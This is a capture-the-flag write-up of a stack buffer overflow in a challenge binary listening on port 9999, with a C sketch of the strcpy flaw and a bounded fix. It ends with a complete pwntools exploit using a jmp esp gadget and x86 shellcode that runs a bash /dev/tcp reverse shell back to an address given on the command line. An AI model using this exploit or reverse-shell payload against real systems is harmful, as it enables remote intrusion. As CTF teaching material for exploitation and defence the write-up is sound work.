yabo
Yabo was a basic buffer overflow challenge with executable stack.
Files
The binary

The binary starts a listener on port 9999 and waits for input.

Buffer Overflow
The program copies the input into a 1024-byte buffer with strcpy, without checking its length, and is therefore vulnerable to a stack buffer overflow.
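
As an added illustration (not the challenge's source, which this page does not include), the C below reconstructs the assumed shape of the flaw: a fixed 1024-byte stack buffer filled by strcpy, next to a bounded version that rejects any request that does not fit. The function names and the constructed request lengths (1023 fits; 1044 is the padding the exploit on this page uses to reach the return address) are assumptions for the demo.

```c
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define BUF_SIZE 1024   /* stack buffer size named in the writeup */

/* Reconstructed flaw (assumed shape, not the challenge's real source): strcpy
 * stops only at the NUL, so a request of BUF_SIZE or more bytes runs past buf
 * into the saved frame pointer and the return address. */
int handle_request_vulnerable(const char *request)
{
    char buf[BUF_SIZE];
    strcpy(buf, request);           /* unbounded copy */
    return (int)strlen(buf);
}

/* Hardened form: locate the NUL within BUF_SIZE bytes before copying and reject
 * what does not fit with its terminator; returns bytes copied, or -1 (EMSGSIZE). */
int handle_request_hardened(const char *request)
{
    char buf[BUF_SIZE];
    const char *nul = memchr(request, '\0', BUF_SIZE);  /* reads at most BUF_SIZE */
    if (nul == NULL) {
        errno = EMSGSIZE;
        return -1;
    }
    size_t len = (size_t)(nul - request);
    memcpy(buf, request, len + 1);  /* bounded by the check above, includes NUL */
    return (int)len;
}

/* Demo helper: constructed request of n 'A' bytes, returns the hardened verdict. */
int hardened_verdict_for_length(size_t n)
{
    char *req = malloc(n + 1);
    if (req == NULL) return -2;
    memset(req, 'A', n);
    req[n] = '\0';
    int rc = handle_request_hardened(req);
    free(req);
    return rc;
}

int main(void)
{
    printf("1023 bytes -> %d\n", hardened_verdict_for_length(1023));
    printf("1044 bytes -> %d\n", hardened_verdict_for_length(1044));
    return 0;
}
```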

Because the stack is executable, we can use a jmp esp gadget to jump to our shellcode and run it.
I used the shellcode embedded in the final exploit below.
A plain /bin/sh shellcode would not work: the remote process that receives the input is a forked child, so the shell would be spawned on the server but would not receive input through the socket. With the shellcode I used, exploiting is as easy as appending the desired command to the shellcode, so I used a bash + /dev/tcp shell.
Final Exploit
#!/usr/bin/env python
from pwn import *

e = context.binary = ELF('./YABO', checksec=False)

if args.REMOTE:
    io = remote('challenge.ctf.games', 32762)
else:
    io = remote('127.0.0.1', 9999)

# Address the /dev/tcp shell connects back to, taken from the positional arguments
ip = sys.argv[1]
port = sys.argv[2]

buf = b'A' * 1044                  # padding up to the saved return address
buf += p32(0x80492e2)              # jmp esp: execution continues into the bytes that follow
buf += (b"\x31\xc0\x31\xd2\xb0\x0b\x52\x66\x68\x2d\x63\x89\xe7\x52\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x89\xe3\x52\xeb\x06\x57\x53\x89\xe1\xcd\x80\xe8\xf5\xff\xff\xff\x62\x61\x73\x68\x20\x2d\x63\x20\x22\x62\x61\x73\x68\x20\x2d\x69\x20\x3e\x26\x20\x2f\x64\x65\x76\x2f\x74\x63\x70\x2f"
        + ip.encode() + b"\x2f" + port.encode()
        + b"\x20\x30\x3e\x26\x31\x22")
io.sendline(buf)
io.interactive()